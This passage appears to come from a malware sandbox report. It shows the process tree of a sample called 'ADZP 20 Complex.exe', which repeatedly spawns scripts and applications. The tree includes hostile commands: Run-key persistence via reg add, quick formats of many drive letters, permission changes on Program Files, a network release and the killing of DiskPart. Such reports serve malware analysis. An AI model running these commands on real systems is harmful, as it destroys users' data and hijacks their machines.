        PID:8224
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8440
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5AC.tmp\5AD.tmp\5AE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:13452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:12492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15796
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:15440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:16472
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16664
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:17688
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:8460
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:8500
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8524
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8556
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8592
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F0E4.tmp\F0E5.tmp\F0E6.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:15236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:9092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:15416
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:16736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:16876
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:7008
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:16852
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:8616
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:8668
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8696
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8720
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8748
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F1E.tmp\F1F.tmp\F20.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:15500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:13864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:14844
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:17240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:17288
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:11980
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:8772
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:8812
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8840
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8860
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:8904
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1890.tmp\1891.tmp\1892.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:15148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:16740
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:16748
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:8948
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:8988
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:9004
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:9044
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:9064
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1C66.tmp\1C67.tmp\1C68.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:15512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:17128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:17208
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:18020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:18376
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:9120
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:9172
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:9200
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:8300
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:5812
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1526.tmp\1527.tmp\1528.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:15668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:16520
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:16556
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:17704
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:17908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:18092
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5884
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5944
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7360
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:5852
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5356
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Program Files"
        5⤵
        Views/modifies file attributes
        
        PID:5524
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:9812
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:9968
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:5740
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:10216
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:10232
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:1640
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:10344
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:11004
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:11212
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:11480
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:11848
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:11960
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:11872
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:11136
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:11856
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7068
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:11560
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:11380
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7436
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:10708
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:10644
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:12348
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12536
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:12688
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:12716
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:12792
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:12856
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12920
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:12968
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:13000
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:13116
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:13172
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:13216
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:13256
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:13292
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:7932
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:12520
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12636
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:13044
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:13652
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:15032
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:17108
    - - C:\Windows\system32\format.com
        
        format /y /q N:
        5⤵
        
        PID:16832
    - - C:\Windows\system32\format.com
        
        format /y /q ├æ:
        5⤵
        
        PID:17844
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2200
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2768
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2784
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2204
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:2396
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:1000
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:3060
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:548
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:644
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:2820
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:7100
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2C7D.tmp\2C7E.tmp\2C7F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:5792
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10216
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:6288
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:10932
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:4116
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:10624
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:11500
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:12740
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:13192
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:7108
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:7124
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7132
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:7140
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:7148
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\30B1.tmp\30B2.tmp\30B3.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:6432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:5984
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:5904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5168
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:10788
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:11940
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:12848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:11784
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:7156
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:5248
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1572
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:6212
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:2340
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\35FE.tmp\35FF.tmp\3600.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:5520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10712
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:11580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:11716
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:11772
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:10624
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:13308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:13780
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:6220
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2052
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:6268
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:6204
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:3456
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\36AA.tmp\36BB.tmp\36BC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:7044
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10764
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:10664
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:6808
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:11404
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:11088
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:13100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:10496
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:3720
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:6336
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3652
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:3952
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:3168
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3B5B.tmp\3B5C.tmp\3B5D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:6660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10468
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10428
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:11320
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:11904
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12068
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12892
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:13196
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:13392
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:3468
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:6564
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:5656
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:4396
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:4820
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3E29.tmp\3E2A.tmp\3E2B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:10288
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10696
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:10744
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:11308
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:12244
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:11508
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:13164
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:13024
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:13896
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4916
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:6684
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3156
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:4676
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:6944
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5207.tmp\5208.tmp\5209.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:10328
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:11332
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:12040
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:12508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:13048
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:12332
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:14232
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:15148
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:15384
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:5612
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:5696
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:7008
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:1516
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:936
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\57F0.tmp\57F1.tmp\57F2.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:10544
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:11392
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:11664
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:6976
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:12480
